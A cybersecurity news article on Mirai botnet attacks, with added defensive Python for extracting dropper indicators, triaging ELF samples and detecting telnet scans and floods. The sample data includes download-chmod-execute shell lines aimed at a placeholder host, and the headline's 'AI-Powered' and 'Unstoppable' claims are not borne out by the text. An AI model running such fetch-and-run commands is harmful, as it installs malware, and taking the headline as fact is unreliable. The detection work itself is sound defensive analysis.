New AI-Powered Mirai Botnet Unleashes Unstoppable Large-Scale DDoS Attacks

The Mirai botnet is actively exploiting known web vulnerabilities to compromise websites: researchers observed over 1,200 sites across 780 customer accounts being targeted, and identified more than 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, delivered through these attacks.

The botnet leverages these compromised sites to launch further attacks, demonstrating its ongoing evolution and persistent threat to internet infrastructure. 

The attackers exploit web vulnerabilities to execute a malicious bash script on the server. This first-stage script downloads a second-stage ELF binary built for the target system's CPU architecture and runs it to install the Mirai payload.

Figure: example of a bash script that, when executed, downloads a second-stage binary that installs the Mirai malware onto the infected host.
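The first-stage script described above follows a fixed pattern: for each supported CPU architecture it downloads one binary, makes it executable, runs it and deletes it. The Python below is an added example, not code from the article or from any Mirai sample; it pulls the download URLs, hosts, executed file names and architecture hints out of such a script so they can be fed to blocklists and sandboxes. The dropper text, the 192.0.2.10 host (documentation address range) and the ARCH_HINTS name mapping are constructed assumptions for the demonstration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of a Mirai-style first-stage dropper. It is
# NOT a sample from the article: the host is in the documentation range
# 192.0.2.0/24 and the paths are invented. Real droppers follow the same
# "download, chmod, run, delete" line once per supported CPU architecture.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.0.2.10/bins/x86 -O x86; chmod +x x86; ./x86 stage2; rm -rf x86
wget http://192.0.2.10/bins/mips -O mips; chmod +x mips; ./mips stage2; rm -rf mips
wget http://192.0.2.10/bins/arm7 -O arm7; chmod +x arm7; ./arm7 stage2; rm -rf arm7
curl -s http://192.0.2.10/bins/mpsl -o mpsl; chmod 777 mpsl; ./mpsl stage2; rm -rf mpsl
"""

# Binary names conventionally used by Mirai-family loaders, mapped to the CPU
# they target (assumed naming convention; unknown names are reported as-is).
ARCH_HINTS = {
    "x86": "x86 32-bit", "i586": "x86 32-bit", "i686": "x86 32-bit",
    "x86_64": "x86-64", "mips": "MIPS big-endian", "mpsl": "MIPS little-endian",
    "arm": "ARM", "arm5": "ARMv5", "arm6": "ARMv6", "arm7": "ARMv7",
    "ppc": "PowerPC", "sh4": "SuperH", "m68k": "Motorola 68k", "spc": "SPARC",
}

URL_RE = re.compile(r"\b(?:wget|curl)\b[^\n;]*?(https?://[^\s;'\"]+)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+([A-Za-z0-9_.\-]+)")
EXEC_RE = re.compile(r"(?:^|;)\s*\./([A-Za-z0-9_.\-]+)")   # "; ./name" invocations
RM_RE = re.compile(r"\brm\s+-r?f\b")


@dataclass
class DropperReport:
    urls: list = field(default_factory=list)
    hosts: set = field(default_factory=set)
    chmodded: list = field(default_factory=list)
    executed: list = field(default_factory=list)
    arches: list = field(default_factory=list)
    self_deleting: bool = False


def analyse_dropper(script: str) -> DropperReport:
    """Pull IOCs and behaviour indicators out of a first-stage dropper script."""
    rep = DropperReport()
    for line in script.splitlines():
        for url in URL_RE.findall(line):
            rep.urls.append(url)
            rep.hosts.add(url.split("//", 1)[1].split("/", 1)[0])
        rep.chmodded.extend(CHMOD_RE.findall(line))
        for name in EXEC_RE.findall(line):
            rep.executed.append(name)
            rep.arches.append(ARCH_HINTS.get(name, name))
        if RM_RE.search(line):
            rep.self_deleting = True
    return rep


def looks_like_dropper(rep: DropperReport) -> bool:
    """Download + chmod + execute + self-delete together are the loader-stub signature."""
    return bool(rep.urls) and bool(rep.chmodded) and bool(rep.executed) and rep.self_deleting


if __name__ == "__main__":
    report = analyse_dropper(SAMPLE_DROPPER)
    print("dropper-like:", looks_like_dropper(report))
    print("download hosts:", sorted(report.hosts))
    for url in report.urls:
        print("  url:", url)
    for name, arch in zip(report.executed, report.arches):
        print(f"  executes {name} -> {arch}")
```

The host set is what goes to the blocklist; the per-architecture binary names tell the analyst which builds to request from the download server while it is still up.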

Separately, the prospect of attackers using AI to build more sophisticated DDoS tooling is a concern: AI-generated polymorphic malware could evade signature-based detection and infect systems at scale, compounding the risk that Mirai-style botnets already pose.

Explore the Inner Workings of a Notorious Botnet

In a DDoS botnet attack, a centralized control server issues attack commands to a network of compromised devices (the botnet), which flood the target with malicious traffic, overwhelming its resources and causing a denial of service.

Botnets enhance DDoS attacks by obscuring the attacker’s identity, amplifying attack power, and distributing the attack across a vast, geographically dispersed network, making mitigation challenging.

Figure: botnet nodes sending attack traffic to the target.

Botnet operators have shifted from spam-based monetization to extortion and DDoS-for-hire services, and malware such as Mirai underpins the latter by exploiting the massive, weakly secured, and often neglected IoT device ecosystem.

These devices offer a large, homogeneous attack platform: they are numerous, often ship with poor vendor security, are rarely patched by consumers, keep growing in number as the market expands, and run standardized operating systems, all of which makes them highly attractive targets for botnet recruitment.

Highlights of the trend

Mirai’s scanning workflow aggressively seeks out vulnerable devices for recruitment. It sends TCP SYN probes to random internet addresses (the original Mirai scanner probed the telnet ports 23 and 2323) to identify hosts with an exposed login service.

It then attempts to log in by brute force, trying a fixed list of factory-default username/password pairs. On a successful login, the scanner reports the device’s address and working credentials to a centralized command-and-control server, which hands them to the loader, expanding the botnet’s reach.

The infection workflow begins with the identification of vulnerable devices. The loader then takes the reported address and credentials, logs in, and deploys the malware binary built for the target device’s CPU architecture.

After successful execution, the compromised device integrates into the botnet, actively participating in scanning and attack operations alongside other nodes. 
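Because the loader serves one binary per CPU architecture, a sample set like the 230 samples mentioned earlier is easiest to sort by reading each ELF header rather than by file name. The Python below is an added example, not code from the article or from the researchers: it labels each sample by ELF class, byte order, e_machine and e_type (constants from the ELF specification), and counts distinct builds per architecture. The sample headers it builds are constructed stand-ins, not real malware, and the file names reuse the Mirai loader naming convention as an assumption.

```python
import struct
from collections import Counter

# ELF e_machine values for the CPU families Mirai-family loaders commonly
# ship binaries for (values from the ELF specification).
EM_NAMES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC",
    40: "ARM", 42: "SuperH", 62: "x86-64", 183: "AArch64",
}
ET_NAMES = {2: "EXEC", 3: "DYN"}


def classify_sample(data: bytes) -> str:
    """Return a short type/architecture label for one sample (script or ELF)."""
    if data.startswith(b"#!"):
        interp = data.split(b"\n", 1)[0][2:].strip().decode("ascii", "replace")
        return f"script ({interp})"
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return "unknown"
    ei_class, ei_data = data[4], data[5]          # EI_CLASS, EI_DATA
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return "malformed ELF"
    endian = "<" if ei_data == 1 else ">"          # e_machine is stored in file byte order
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    bits = 32 if ei_class == 1 else 64
    order = "LE" if ei_data == 1 else "BE"
    machine = EM_NAMES.get(e_machine, f"machine#{e_machine}")
    etype = ET_NAMES.get(e_type, f"type#{e_type}")
    return f"ELF{bits}-{order} {machine} {etype}"


def fake_elf_header(bits: int, little: bool, machine: int, e_type: int = 2) -> bytes:
    """Build a minimal, constructed ELF header (not a real binary) for the demo."""
    e_ident = (b"\x7fELF"
               + bytes([1 if bits == 32 else 2, 1 if little else 2, 1])  # class, data, version
               + b"\x00" * 9)                                             # OS/ABI + padding
    endian = "<" if little else ">"
    return e_ident + struct.pack(endian + "HH", e_type, machine) + b"\x00" * 44


# Constructed sample set, named the way Mirai loaders name their binaries.
SAMPLES = {
    "mips":      fake_elf_header(32, little=False, machine=8),
    "mpsl":      fake_elf_header(32, little=True,  machine=8),
    "arm7":      fake_elf_header(32, little=True,  machine=40),
    "x86":       fake_elf_header(32, little=True,  machine=3),
    "x86_64":    fake_elf_header(64, little=True,  machine=62),
    "update.sh": b"#!/bin/sh\nwget http://192.0.2.10/bins/mips -O /tmp/m\n",
    "junk.bin":  b"\x00\x01\x02garbage",
}


def triage(samples: dict) -> dict:
    """Label every sample in a name -> bytes mapping."""
    return {name: classify_sample(data) for name, data in samples.items()}


def arch_histogram(samples: dict) -> Counter:
    """Distinct ELF builds per architecture: a quick view of what the loader serves."""
    return Counter(label for label in triage(samples).values() if label.startswith("ELF"))


if __name__ == "__main__":
    for name, label in triage(SAMPLES).items():
        print(f"{name:10s} {label}")
    print(arch_histogram(SAMPLES))
```

Note that "mips" and "mpsl" differ only in EI_DATA; relying on file names would miss that distinction when the loader renames files, while the header does not lie unless it has been deliberately corrupted, which the malformed-ELF branch surfaces.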

Workflow of the Infection

According to Imperva, the botnet attack workflow begins with the botmaster sending an attack command to the control server; the command-and-control system then disseminates specific attack instructions to the individual nodes.

On receiving these directives, the nodes execute the attack concurrently, flooding the target with packets at maximum rate while continuing their background scanning so that the botnet keeps growing through the discovery and infection of new hosts.
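Both behaviours described on this page, the scanning workflow (bare SYNs to telnet ports on many distinct hosts from one source) and the attack workflow (many nodes flooding one target at maximum rate), are visible in flow telemetry. The Python below is an added example, not code from Imperva or the article; it runs both detections over a constructed set of flow records. The Flow record layout, the thresholds (20 scanned hosts, 50 sources, 10,000 packets per second) and all addresses are assumptions chosen for the demonstration, and real deployments would tune them to their baseline.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # flow start, seconds (assumed record layout)
    src: str
    dst: str
    dport: int
    flags: str     # TCP flags seen in the flow as letters: "S" = bare SYN, "SPA" = full session
    packets: int


TELNET_PORTS = {23, 2323}   # ports the original Mirai scanner probed


def detect_scanners(flows, min_targets: int = 20):
    """Sources sending bare SYNs to telnet ports on at least min_targets distinct hosts."""
    targets = defaultdict(set)
    for f in flows:
        if f.dport in TELNET_PORTS and f.flags == "S":
            targets[f.src].add(f.dst)
    return sorted(src for src, dsts in targets.items() if len(dsts) >= min_targets)


def detect_floods(flows, window: float = 1.0, min_sources: int = 50, min_pps: float = 10_000):
    """Destinations hit by many sources at a combined packet rate above min_pps in one window."""
    buckets = defaultdict(lambda: {"sources": set(), "packets": 0})
    for f in flows:
        b = buckets[(f.dst, int(f.ts // window))]
        b["sources"].add(f.src)
        b["packets"] += f.packets
    hits = {dst for (dst, _), b in buckets.items()
            if len(b["sources"]) >= min_sources and b["packets"] / window >= min_pps}
    return sorted(hits)


def build_sample_flows():
    """Constructed flow records (not real telemetry) mixing three behaviours."""
    flows = []
    # 1. A Mirai-style scanner: one source, bare SYNs to port 23 on 30 distinct hosts.
    for i in range(30):
        flows.append(Flow(50.0 + i, "198.51.100.7", f"203.0.113.{i + 1}", 23, "S", 1))
    # 2. A benign admin host: completed telnet sessions to three devices (must not alert).
    for i in range(3):
        flows.append(Flow(60.0 + i, "198.51.100.8", f"203.0.113.{i + 1}", 23, "SPA", 40))
    # 3. An attack: 60 bots each sending 300 packets to one web server within one second.
    for i in range(60):
        flows.append(Flow(100.0 + i * 0.01, f"10.0.{i // 256}.{i % 256}", "203.0.113.50", 80, "S", 300))
    return flows


SAMPLE_FLOWS = build_sample_flows()

if __name__ == "__main__":
    print("scanners:", detect_scanners(SAMPLE_FLOWS))
    print("flood targets:", detect_floods(SAMPLE_FLOWS))
```

The scanner check keys on the flag pattern rather than volume, because a Mirai node only ever sends one SYN per probed address; the flood check keys on source diversity plus rate, which is what distinguishes a botnet flood from a single noisy client.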

Kaaviya (https://cyberpress.org/) is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
